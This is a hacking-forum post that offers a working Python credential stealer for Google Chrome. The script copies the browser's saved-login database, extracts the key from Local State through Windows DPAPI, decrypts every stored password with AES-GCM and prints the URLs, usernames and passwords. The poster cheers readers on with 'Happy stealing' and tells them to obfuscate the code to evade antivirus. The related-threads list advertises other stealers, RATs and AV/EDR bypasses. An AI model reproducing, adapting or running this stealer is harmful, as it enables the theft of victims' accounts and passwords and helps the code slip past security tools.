Chrome Email and password stealer
by Malware420 - Tuesday February 11, 2025 at 10:52 AM
#1
Working On the most up to date version of google chrome: 132.0.6834.196 (Officiële build) (64-bits) (cohort: Control) 
Happy stealing everyone! Kappa

Python script:

import os
import json
import shutil
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
from win32crypt import CryptUnprotectData
username = os.environ.get('USERNAME')
login_data = fr"C:\Users\{username}\AppData\Local\Google\Chrome\User Data\Default\Login Data"
temp_database = 'temp_login_data.db'
shutil.copy2(login_data, temp_database)
conn = sqlite3.connect(temp_database)
cursor = conn.cursor()
cursor.execute("SELECT origin_url, username_value, password_value FROM logins")
def decrypt_password(encrypted_password, browser='chrome'):
    local_state_path = os.path.expandvars(r"%LOCALAPPDATA%\Google\Chrome\User Data\Local State")
    try:
        with open(local_state_path, "r", encoding="utf-8") as f:
            local_state = json.load(f)
            encrypted_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
            encrypted_key = encrypted_key[5:]
            key = win32crypt.CryptUnprotectData(encrypted_key)[1]
            nonce = encrypted_password[3:15]
            ciphertext = encrypted_password[15:-16]
            tag = encrypted_password[-16:]
            cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
            decrypted_password = cipher.decrypt_and_verify(ciphertext, tag)
            return decrypted_password.decode("utf-8")
    except Exception as e:
        print(f"Error decrypting password: {e}")
        return None
for row in cursor.fetchall():
    origin_url, username_value, password_value = row
    if password_value:
        decrypted_password = decrypt_password(password_value)
        if decrypted_password:
            print(f"URL: {origin_url}")
            print(f"Username: {username_value}")
            print(f"Password: {decrypted_password}")
        else:
            print(f"URL: {origin_url}")
            print(f"Username: {username_value}")
            print(f"Password: Unable to decrypt: {password_value}")
    else:
        print(f"URL: {origin_url}")
        print(f"Username: {username_value}")
        print(f"Password: [Encrypted]: {password_value}")
conn.close()
os.remove(temp_database)


This code will be detected by anti viruses.
If you want to use it you will have to obfuscate the code!
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Bypass AV and EDR - Halos Gate from Sektor7 0x01 123 10,844 06-26-2026, 11:50 AM
Last Post: hashxyz
  Python Chrome Data Stealer (url, username/email, password, etc) Discord Webhook mooning 134 8,276 06-24-2026, 07:23 PM
Last Post: marcot
  Xordium stealer for Pulsar v2.4.5 nullvex 23 549 06-24-2026, 07:17 PM
Last Post: marcot
  Venom RAT + HVNC + Stealer + Grabber v6.0.3 ottomanturks 2 224 01-23-2026, 11:45 AM
Last Post: cysc
  python free stealer web panel rooterdam 228 15,912 01-09-2026, 10:12 PM
Last Post: m1ndiwnl



 Users browsing this thread: 1 Guest(s)